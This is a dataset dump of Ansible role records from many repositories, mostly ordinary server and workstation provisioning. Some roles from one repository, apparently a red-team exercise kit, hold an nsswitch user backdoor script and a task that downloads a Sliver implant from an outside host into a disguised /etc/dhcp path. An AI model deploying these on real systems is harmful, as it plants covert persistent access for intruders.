unit_type
string
repo_path
string
commit_id
string
stars
int32
unit_prefix
string
shard
int32
license_types
list
files
list
quality
dict
flags
dict
ansible_role
Spanfile/ansible
7855a8078aebb58c073d2e87f01beb1835d7ba99
0
roles/monitor
7,244
[ "no_license" ]
[ { "path": "roles/monitor/tasks/main.yml", "content": "- name: Attempt to remove old monitoring user\n user:\n name: icinga\n state: absent\n remove: yes\n ignore_errors: yes\n when: inventory_hostname != 'monitor.int.spans.me'\n- name: Add monitoring user\n user:\n name: monitor\n system:...
{ "task_files": 3, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 3, "total_bytes": 2616, "all_permissive": false }
ansible_role
Spanfile/ansible
7855a8078aebb58c073d2e87f01beb1835d7ba99
0
roles/sshd
7,244
[ "no_license" ]
[ { "path": "roles/sshd/tasks/main.yml", "content": "- name: Copy sshd_config\n copy:\n dest: \"/etc/ssh/sshd_config\"\n src: sshd_config\n- name: Restart sshd\n systemd:\n name: sshd\n state: restarted\n enabled: yes\n", "license_type": "no_license", "detected_licenses": [], "siz...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 172, "all_permissive": false }
ansible_role
mirzaindra/ansible_test
3b82886cb7b9378e293dccf12ecb564bc55179c8
0
roles/base
7,244
[ "no_license" ]
[ { "path": "roles/base/tasks/main.yml", "content": "- name: install mariadb server package (CentOS)\n tags: centos,db,mariadb\n dnf:\n name: mariadb\n state: latest\n when: ansible_distribution == \"CentOS\"\n\n- name: install mariadb package (Ubuntu)\n tags: db,mariadb,ubuntu\n apt: \n name: m...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 403, "all_permissive": false }
ansible_role
mirzaindra/ansible_test
3b82886cb7b9378e293dccf12ecb564bc55179c8
0
roles/workstations
7,244
[ "no_license" ]
[ { "path": "roles/workstations/tasks/main.yml", "content": "- name: install unzip\n package: \n name: unzip\n\n- name: install terraform\n unarchive:\n src: https://releases.hashicorp.com/terraform/1.0.10/terraform_1.0.10_linux_amd64.zip\n dest: /usr/local/bin\n remote_src: yes\n mode: 0755\...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 272, "all_permissive": false }
ansible_role
CUCCS/2015-linux-public-RachelLYY
fa5bbc3e46144cc6d2ec6687dad50fd050d75e22
0
lab7/code/roles/common
7,244
[ "no_license" ]
[ { "path": "lab7/code/roles/common/tasks/main.yml", "content": "# main.yml\n- name: os update\n shell: apt-get update\n\n- name: install software\n apt: name={{ item }} state=installed\n with_items:\n - proftpd\n - expect\n - nfs-kernel-server\n - isc-dhcp-server\n - bind9\n ...
{ "task_files": 1, "has_defaults": false, "has_handlers": true, "has_templates": false }
{ "file_count": 3, "total_bytes": 2336, "all_permissive": false }
ansible_role
hellwen/ansible-k8s
4945dc5f1c697d67a6e415d0d923a54033fe89a6
0
roles/docker
7,244
[ "no_license" ]
[ { "path": "roles/docker/tasks/main.yml", "content": "---\n- name: Download and install docker\n yum: name=docker state=present\n\n- name: Modify docker log driver\n replace:\n dest: /etc/sysconfig/docker\n regexp: '(\\s+)*--log-driver=journald*'\n replace: '\\1--log-driver=json-file --log-opt max...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 376, "all_permissive": false }
ansible_role
hellwen/ansible-k8s
4945dc5f1c697d67a6e415d0d923a54033fe89a6
0
roles/docker-registry-client-ca
7,244
[ "no_license" ]
[ { "path": "roles/docker-registry-client-ca/tasks/main.yml", "content": "---\n- name: Create the ca floder\n file: name=/etc/docker/certs.d/k8s-registry.zeusis.com:32000 state=directory\n\n- name: Copy the ca.crt to remote host\n copy: src=ca.crt dest=/etc/docker/certs.d/k8s-registry.zeusis.com:32000/ca.cr...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 268, "all_permissive": false }
ansible_role
hellwen/ansible-k8s
4945dc5f1c697d67a6e415d0d923a54033fe89a6
0
roles/docker-remove
7,244
[ "no_license" ]
[ { "path": "roles/docker-remove/tasks/main.yml", "content": "---\n- name: Be sure docker service stopped\n service: name=docker state=stopped\n\n- name: Remove docker vg\n lvg: vg=docker state=absent force=yes\n\n- name: Remove docker\n yum: name=docker state=removed\n", "license_type": "no_license", ...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 202, "all_permissive": false }
ansible_role
hellwen/ansible-k8s
4945dc5f1c697d67a6e415d0d923a54033fe89a6
0
roles/docker2thinpool
7,244
[ "no_license" ]
[ { "path": "roles/docker2thinpool/tasks/main.yml", "content": "---\n\n- name: Stop the docker service\n service: name=docker state=stopped\n\n- name: Delete the docker container files\n file: path=/var/lib/docker state=absent\n\n- name: Create docker vg\n lvg: vg=docker pvs={{ pv }}\n\n- name: Setup docke...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 704, "all_permissive": false }
ansible_role
paulmolin42/la-plateforme-and-co
15ac06f03e1d6e043acb1af1e03a4fdc284c03df
0
provisioning/roles/gcc
7,244
[ "no_license" ]
[ { "path": "provisioning/roles/gcc/tasks/main.yml", "content": "---\n- name: Install g++\n apt:\n state: present\n pkg: g++\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 63 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 63, "all_permissive": false }
ansible_role
paulmolin42/la-plateforme-and-co
15ac06f03e1d6e043acb1af1e03a4fdc284c03df
0
provisioning/roles/git
7,244
[ "no_license" ]
[ { "path": "provisioning/roles/git/tasks/main.yml", "content": "---\n- name: Install git\n apt:\n state: present\n pkg: git\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 63 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 63, "all_permissive": false }
ansible_role
paulmolin42/la-plateforme-and-co
15ac06f03e1d6e043acb1af1e03a4fdc284c03df
0
provisioning/roles/mongodb
7,244
[ "no_license" ]
[ { "path": "provisioning/roles/mongodb/tasks/main.yml", "content": "---\n- name: Install MongoDB\n apt:\n state: present\n pkg: mongodb\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 71 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 71, "all_permissive": false }
ansible_role
hsbaath/Ansible_playbooks
f84c6d2de60989c972593028468cd06fcad2a491
0
roles/cassandra_node2
7,244
[ "no_license" ]
[ { "path": "roles/cassandra_node2/tasks/main.yml", "content": "---\n\n - name: Create Cassandra directory\n file: path=/etc/cassandra state=directory owner={{ user }} group={{ group }} mode=0777\n\n - name: Download Cassandra \n command: wget http://www.us.apache.org/dist/cassandra/2.1.9/apache-cassandra...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 1328, "all_permissive": false }
ansible_role
hsbaath/Ansible_playbooks
f84c6d2de60989c972593028468cd06fcad2a491
0
roles/jboss
7,244
[ "no_license" ]
[ { "path": "roles/jboss/files/jboss-as-standalone.sh", "content": "#!/bin/sh\n### BEGIN INIT INFO\n# Provides: jboss\n# Required-Start: $local_fs $remote_fs $network $syslog\n# Required-Stop: $local_fs $remote_fs $network $syslog\n# Default-Start: 2 3 4 5\n# Default-Stop: 0 1 6\n# Sh...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 3, "total_bytes": 2919, "all_permissive": false }
ansible_role
hsbaath/Ansible_playbooks
f84c6d2de60989c972593028468cd06fcad2a491
0
roles/tomcat
7,244
[ "no_license" ]
[ { "path": "roles/tomcat/README.md", "content": "# Tomcat Installation on Ubuntu 14.04 using Ansible\n--------\nThis playbook deploys Tomcat Server on Ubuntu 14.04 LTS.\n\n\n## Then run this playbook:\n\n```\nansible-playbook tomcat.yml --extra-vars \"hosts=192.168.1.78 user=harpreet group=root admin_usernam...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1694, "all_permissive": false }
ansible_role
npitsillos/ansible-pis
bd12e78a2684d3208dbc708a51806ab86ee56939
0
roles/config
7,244
[ "no_license" ]
[ { "path": "roles/config/tasks/main.yml", "content": "---\n- name: Setup apt packages in Pis\n import_tasks: apt-packages.yml\n\n- name: Add netplan config to Pis\n import_tasks: config.yml\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 133 }, { "path": "roles/...
{ "task_files": 3, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 5, "total_bytes": 1296, "all_permissive": false }
ansible_role
pjuned/ansible-roleshyd
9faafaf541061a147738b6954ca0376395341dfb
0
roles/common
7,244
[ "no_license" ]
[ { "path": "roles/common/tasks/mongodb-setup.yaml", "content": "- name: copy mongodb repo\n ansible.builtin.copy:\n src: mongodb.repo\n dest: /etc/yum.repos.d/mongodb.repo\n\n- name: install mongodb client\n ansible.builtin.package:\n name: mongodb-org-shell\n state : present\n\n- name: get the...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 1193, "all_permissive": false }
ansible_role
Ozin/dotfiles
3c6d7536a9e2d8bac647d186da0fbaedb5ebdaee
0
ansible/roles/dockutil
7,244
[ "no_license" ]
[ { "path": "ansible/roles/dockutil/tasks/main.yml", "content": "---\n\n- name: Clean up dock\n command: dockutil --remove all\n\n- name: Fill dock\n command: dockutil --add '{{ item.path }}'\n loop: \"{{ dockutil }}\"\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 148...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1364, "all_permissive": false }
ansible_role
Ozin/dotfiles
3c6d7536a9e2d8bac647d186da0fbaedb5ebdaee
0
ansible/roles/fish
7,244
[ "no_license" ]
[ { "path": "ansible/roles/fish/files/config.fish", "content": "# See other themes at\n# ~/.config/fish/functions/__bobthefish_colors.fish\nfunction bobthefish_colors -S -d 'Define a custom bobthefish color scheme'\n\n # optionally include a base color scheme...\n __bobthefish_colors terminal-dark\n\n ...
{ "task_files": 2, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 4, "total_bytes": 4627, "all_permissive": false }
ansible_role
Ozin/dotfiles
3c6d7536a9e2d8bac647d186da0fbaedb5ebdaee
0
ansible/roles/git
7,244
[ "no_license" ]
[ { "path": "ansible/roles/git/files/private.gitconfig", "content": "[user]\n\tname = Ozin\n\temail = <EMAIL>\n\tsigningkey = ~/.ssh/al-uf-nb384.pub\n\n[branch]\n\tsort = -commiterdate\n\n[gpg]\n\tformat = ssh\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 127 }, { ...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 585, "all_permissive": false }
ansible_role
Ozin/dotfiles
3c6d7536a9e2d8bac647d186da0fbaedb5ebdaee
0
ansible/roles/homebrew
7,244
[ "no_license" ]
[ { "path": "ansible/roles/homebrew/tasks/main.yml", "content": "---\n\n- name: Execute OSX hombrew install\n import_tasks: osx-homebrew-install.yml\n when: ansible_os_family == 'Darwin'\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 120 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 120, "all_permissive": false }
ansible_role
Ozin/dotfiles
3c6d7536a9e2d8bac647d186da0fbaedb5ebdaee
0
ansible/roles/homebrew_cleanup
7,244
[ "no_license" ]
[ { "path": "ansible/roles/homebrew_cleanup/tasks/main.yml", "content": "---\n\n- name: Execute OSX hombrew cleanup\n import_tasks: osx-homebrew-cleanup.yml\n when: ansible_os_family == 'Darwin'\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 120 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 120, "all_permissive": false }
ansible_role
Ozin/dotfiles
3c6d7536a9e2d8bac647d186da0fbaedb5ebdaee
0
ansible/roles/iterm2
7,244
[ "no_license" ]
[ { "path": "ansible/roles/iterm2/tasks/main.yml", "content": "---\n\n# Read https://code.visualstudio.com/docs/getstarted/settings\n- name: Execute OSX configuration for iterm2\n import_tasks: osx-install.yml\n when: ansible_os_family == 'Darwin'\n", "license_type": "no_license", "detected_licenses...
{ "task_files": 2, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 563, "all_permissive": false }
ansible_role
Ozin/dotfiles
3c6d7536a9e2d8bac647d186da0fbaedb5ebdaee
0
ansible/roles/vscode
7,244
[ "no_license" ]
[ { "path": "ansible/roles/vscode/vars/main.yml", "content": "---\n\nvscode_extensions:\n - arcticicestudio.nord-visual-studio-code\n - dbaeumer.vscode-eslint\n - eamodio.gitlens\n - equinusocio.vsc-material-theme\n - equinusocio.vsc-material-theme-icons\n - esbenp.prettier-vscode\n - hbenl.vscode-test...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1107, "all_permissive": false }
ansible_role
wheelodex/wheelodex
309bdc6da8ad3e8a478932701a54b3befabf9d52
56
deployment/roles/core
7,244
[ "no_license" ]
[ { "path": "deployment/roles/core/handlers/main.yml", "content": "---\n- name: Restart journald\n ansible.builtin.service:\n name: systemd-journald\n state: restarted\n\n- name: Enable new unattended-upgrades settings\n ansible.builtin.command: dpkg-reconfigure -f noninteractive unattended-upgrades\n...
{ "task_files": 1, "has_defaults": false, "has_handlers": true, "has_templates": false }
{ "file_count": 2, "total_bytes": 2025, "all_permissive": false }
ansible_role
wheelodex/wheelodex
309bdc6da8ad3e8a478932701a54b3befabf9d52
56
deployment/roles/nginx
7,244
[ "no_license" ]
[ { "path": "deployment/roles/nginx/files/maintenance.html", "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"\n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n<head>\n<title>...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 5, "total_bytes": 2707, "all_permissive": false }
ansible_role
wheelodex/wheelodex
309bdc6da8ad3e8a478932701a54b3befabf9d52
56
deployment/roles/postgres
7,244
[ "no_license" ]
[ { "path": "deployment/roles/postgres/meta/argument_specs.yml", "content": "---\nargument_specs:\n main:\n options:\n postgres_dbname:\n type: str\n required: true\n postgres_dbuser:\n type: str\n required: true\n postgres_dbpass:\n type: str\n req...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1155, "all_permissive": false }
ansible_role
wheelodex/wheelodex
309bdc6da8ad3e8a478932701a54b3befabf9d52
56
deployment/roles/security
7,244
[ "no_license" ]
[ { "path": "deployment/roles/security/files/sshd.conf", "content": "PasswordAuthentication no\nPermitRootLogin no\n\nAcceptEnv COLORTERM TERM\n# Used by WezTerm:\nAcceptEnv TERM_PROGRAM TERM_PROGRAM_VERSION WEZTERM_*\n\n# vim:set ft=sshdconfig:\n", "license_type": "no_license", "detected_licenses": [...
{ "task_files": 1, "has_defaults": false, "has_handlers": true, "has_templates": false }
{ "file_count": 3, "total_bytes": 1389, "all_permissive": false }
ansible_role
wheelodex/wheelodex
309bdc6da8ad3e8a478932701a54b3befabf9d52
56
deployment/roles/uwsgi
7,244
[ "no_license" ]
[ { "path": "deployment/roles/uwsgi/tasks/main.yml", "content": "---\n- name: Install uWSGI\n ansible.builtin.apt:\n name:\n - uwsgi\n - uwsgi-plugin-python3\n state: present\n update_cache: false\n\n- name: Configure uWSGI\n ansible.builtin.template:\n src: wheelodex.ini\n dest: /e...
{ "task_files": 1, "has_defaults": false, "has_handlers": true, "has_templates": true }
{ "file_count": 4, "total_bytes": 1369, "all_permissive": false }
ansible_role
wheelodex/wheelodex
309bdc6da8ad3e8a478932701a54b3befabf9d52
56
deployment/roles/wheelodex
7,244
[ "no_license" ]
[ { "path": "deployment/roles/wheelodex/files/wsgi.py", "content": "from wheelodex.app import create_app\n\napplication = create_app()\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 65 }, { "path": "deployment/roles/wheelodex/templates/mail-systemd-failure.sh", ...
{ "task_files": 2, "has_defaults": true, "has_handlers": true, "has_templates": true }
{ "file_count": 9, "total_bytes": 8254, "all_permissive": false }
ansible_role
Amine-Ounissi/CI-CD-AngularProject
0e9a1c32a2a97912fd57ed602de2f492f7f2a850
0
ansible/roles/docker
7,244
[ "no_license" ]
[ { "path": "ansible/roles/docker/tasks/main.yml", "content": "---\n# tasks file for docker\n - name: create docker image\n docker_image:\n name: devops\n build:\n path: /var/lib/jenkins/workspace/CI-CD-Angular\n pull: no\n source: build...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 528, "all_permissive": false }
ansible_role
Amine-Ounissi/CI-CD-AngularProject
0e9a1c32a2a97912fd57ed602de2f492f7f2a850
0
ansible/roles/docker-registry
7,244
[ "no_license" ]
[ { "path": "ansible/roles/docker-registry/tasks/main.yml", "content": "---\n# tasks file for docker-registry\n- name: login dockerhub\n docker_login:\n username: \"amineounissi\"\n password: \"<PASSWORD>\"\n- name: push to dockerhub\n docker_image:\n name: devops:latest\n repository: amineounis...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 269, "all_permissive": false }
ansible_role
vikingdata/articles
fe00cf97faea63f1cb3942af40cf114396a298fa
0
tools/automation/ansible_library/roles/TestEnv
7,244
[ "no_license" ]
[ { "path": "tools/automation/ansible_library/roles/TestEnv/tasks/main.yml", "content": "\n- name: print facts\n pause:\n seconds : 1\n prompt : facts {{ansible_facts | to_nice_json(indent=2)}}\n\n- name: create directory if they don't exist\n file:\n path: \"{{ TestEnv_home }}/{{item}}\"\n sta...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 514, "all_permissive": false }
ansible_role
vikingdata/articles
fe00cf97faea63f1cb3942af40cf114396a298fa
0
tools/automation/ansible_library/roles/mysql_community
7,244
[ "no_license" ]
[ { "path": "tools/automation/ansible_library/roles/mysql_community/templates/mysql_single_community_server.j2", "content": " \n[mysqld]\nserver-id = 1\n\nskip-name-resolve = 1\nperformance-schema = 1B\nlocal-infile = 0\nmysqlx = 0\nopen_files_limit = 2000\nmax_allowed_packet = 256M\nsql_mode = \"STRICT_TRAN...
{ "task_files": 3, "has_defaults": true, "has_handlers": false, "has_templates": true }
{ "file_count": 7, "total_bytes": 9408, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/blacklist
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/blacklist/tasks/main.yml", "content": "---\n- block:\n - name: \"Check that each server is not blacklisted from being patched via Ansible\"\n assert:\n that:\n - \"'{{ inventory_hostname }}' not in '{{ hostvars['localhost']['blacklist_hosts'] }}'\"\n s...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 754, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/check_everything_configured
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/check_everything_configured/tasks/main.yml", "content": "---\n- block:\n - name: \"Checking server is Red Hat\"\n assert:\n that:\n - ansible_distribution == 'RedHat'\n fail_msg: \"This server is not RHEL.\"\n success_msg: \"Server is RHEL.\"\n r...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 2716, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/check_server_needs_update
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/check_server_needs_update/tasks/main.yml", "content": "---\n- name: \"Checking each server for outstanding yum updates\"\n yum:\n list: updates\n update_cache: true\n register: yumoutput\n changed_when: yumoutput.results|length > 0\n\n- name: \"Adding servers that...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 488, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/patch
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/patch/tasks/main.yml", "content": "---\n- block:\n # Trigger a yum update Ansible 'Job' on each server, with a fail timeout of 12 minutes\n - name: \"Triggering yum update on each server\"\n yum:\n name: \"*\"\n state: latest\n disable_gpg_check: true\n...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 1937, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/place_in_maintenance_mode
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/place_in_maintenance_mode/tasks/main.yml", "content": "---\n- block:\n - name: \"Placing each server in Maintenance Mode in SCOM\"\n uri:\n url: \"http://scom_mm_hostname/MM/Home/InstantMM/?ComputerName={{ inventory_hostname }}.company-name.co.uk&Min=240&MMAction=...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 723, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/post_check
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/post_check/tasks/main.yml", "content": "---\n- name: \"Let's wait 1 minute for everything to finish coming back up, before checking patching was successful\"\n pause:\n minutes: 1\n\n- block:\n - name: \"Making sure any relevant Oracle Databases came back up successfu...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 3762, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/reboot
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/reboot/tasks/main.yml", "content": "---\n- block:\n\n - name: \"Rebooting servers\"\n debug:\n msg: \"!!! WARNING !!! - Now rebooting {{ inventory_hostname }} and then testing it came back up. This may take a few minutes, please wait ... \"\n\n - name: \"Reboot o...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 864, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/remove_snapshot
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/remove_snapshot/tasks/main.yml", "content": "---\n- block:\n\n - name: \"Removing snapshot for {{ inventory_hostname }} - onprem servers\"\n delegate_to: localhost\n shell:\n cmd: \"echo 'Connect-VIServer host1234.company-name.co.uk -User USERNAME -Password...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 1337, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/stop_applications
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/stop_applications/tasks/main.yml", "content": "---\n- block:\n - name: \"Detecting Splunk\"\n shell: systemctl list-units | grep -wc splunk.service\n register: splunk_service\n failed_when: splunk_service.rc == 257\n\n - debug:\n msg: \"No Splunk instances ...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 5189, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/summary
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/summary/tasks/main.yml", "content": "---\n- name: \"Getting contents of output.log\"\n shell:\n cmd: tac /ansible/patching/output.log | grep '#######################' -m 1 -B 9999 | tac\n register: log_contents\n\n- name: \"Summary from the latest Playbook run\"\n de...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 286, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/take_snapshot
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/take_snapshot/tasks/main.yml", "content": "---\n- block:\n\n - include_role:\n name: /ansible/snapshots/roles/take_snapshot\n vars:\n host_to_snap: \"{{ inventory_hostname }}\"\n snap_reason: \"Patching\"\n snap_source: \"input_source_here\"\n wh...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 1033, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/wall
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/wall/tasks/main.yml", "content": "---\n- name: \"Sending wall message\"\n command: wall This server is about to be patched via Ansible and will likely reboot in the next few minutes. Please save any work immediately.\n", "license_type": "no_license", "detected_lic...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 180, "all_permissive": false }
ansible_role
0phoi5/ansible
0586cf978b5affcc3c57e97377944043cbce0d63
0
patching_playbook/roles/yum_clean_all
7,239
[ "no_license" ]
[ { "path": "patching_playbook/roles/yum_clean_all/tasks/main.yml", "content": "---\n- block:\n - name: \"Running yum clean all on each server\"\n command: yum clean all\n rescue:\n - name: \"Adding reason for failure to output.log\"\n shell:\n cmd: echo '{{ ansible_date_time.date }} {{ an...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 456, "all_permissive": false }
ansible_role
martyni/ubuntu_build
07bd6c160e997bc2cc9e5753008109e8bfe74fb8
0
roles/common
7,239
[ "no_license" ]
[ { "path": "roles/common/tasks/main.yml", "content": "- name: Add the ansible user\n user:\n name: ansible\n group: sudo\n generate_ssh_key: yes\n ssh_key_bits: 2048\n ssh_key_file: .ssh/id_rsa\n register: ansible_user\n\n\n- stat: path=/home/ansible/.ssh/authorized_keys\n register: authori...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 443, "all_permissive": false }
ansible_role
vostapch/test_50_Cent
cce38ac0e69bed744926dbb5eb66a38169a46783
0
roles/nginx
7,239
[ "no_license" ]
[ { "path": "roles/nginx/vars/main.yml", "content": "mysql_root_password: \"<PASSWORD>\"\nhttp_host: \"example2.com\"\nhttp_conf: \"example2.com.conf\"\nhttp_port: \"80\"\n\ndb_user: app1user\ndb_password: <PASSWORD>\ndb_name: app1\n", "license_type": "no_license", "detected_licenses": [], "size_b...
{ "task_files": 2, "has_defaults": true, "has_handlers": false, "has_templates": true }
{ "file_count": 5, "total_bytes": 2150, "all_permissive": false }
ansible_role
icefisher225/CDT-ansible
39db658e53fbade93da6b2ca904eac9f1b2e4cc0
1
roles/linux_deploy_cchr
7,239
[ "no_license" ]
[ { "path": "roles/linux_deploy_cchr/files/malUser.sh", "content": "#Nsswitch backdoor\n#<NAME> <EMAIL>\nQUIET (){\n\teval $@ 2>/dev/null >/dev/null\n\treturn $?\n}\n\nusers_db() {\n # /var/lib/misc on Debian\n # /var/db on RHEL\n\n # Add backdoored users if system supports that\n\tif [ \"`command -v...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 3668, "all_permissive": false }
ansible_role
icefisher225/CDT-ansible
39db658e53fbade93da6b2ca904eac9f1b2e4cc0
1
roles/linux_deploy_command
7,239
[ "no_license" ]
[ { "path": "roles/linux_deploy_command/tasks/main.yaml", "content": "---\n\n - name: deploy command\n shell: \"{{ shell_command }}\"\n args:\n executable: /bin/bash\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 97 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 97, "all_permissive": false }
ansible_role
icefisher225/CDT-ansible
39db658e53fbade93da6b2ca904eac9f1b2e4cc0
1
roles/linux_deploy_nochanges
7,239
[ "no_license" ]
[ { "path": "roles/linux_deploy_nochanges/tasks/main.yaml", "content": "---\n- name: Create a folder for NoChanges\n ansible.builtin.file:\n path: \"/etc/pulse/\"\n state: directory\n mode: \"{{ mode }}\"\n\n- name: Copy NoChanges\n ansible.builtin.copy:\n src: nochanges.py\n dest: \"/etc/pul...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 3, "total_bytes": 4979, "all_permissive": false }
ansible_role
icefisher225/CDT-ansible
39db658e53fbade93da6b2ca904eac9f1b2e4cc0
1
roles/linux_deploy_sliver
7,239
[ "no_license" ]
[ { "path": "roles/linux_deploy_sliver/tasks/main.yaml", "content": "---\n- name: Create DHCP folder\n ansible.builtin.file:\n state: directory\n path: /etc/dhcp\n owner: root\n group: root\n mode: 0755\n\n- name: Download sliver\n ansible.builtin.get_url:\n url: http://172.16.0.9:8000/lin...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 542, "all_permissive": false }
ansible_role
icefisher225/CDT-ansible
39db658e53fbade93da6b2ca904eac9f1b2e4cc0
1
roles/linux_deploy_ssh_public_keys
7,239
[ "no_license" ]
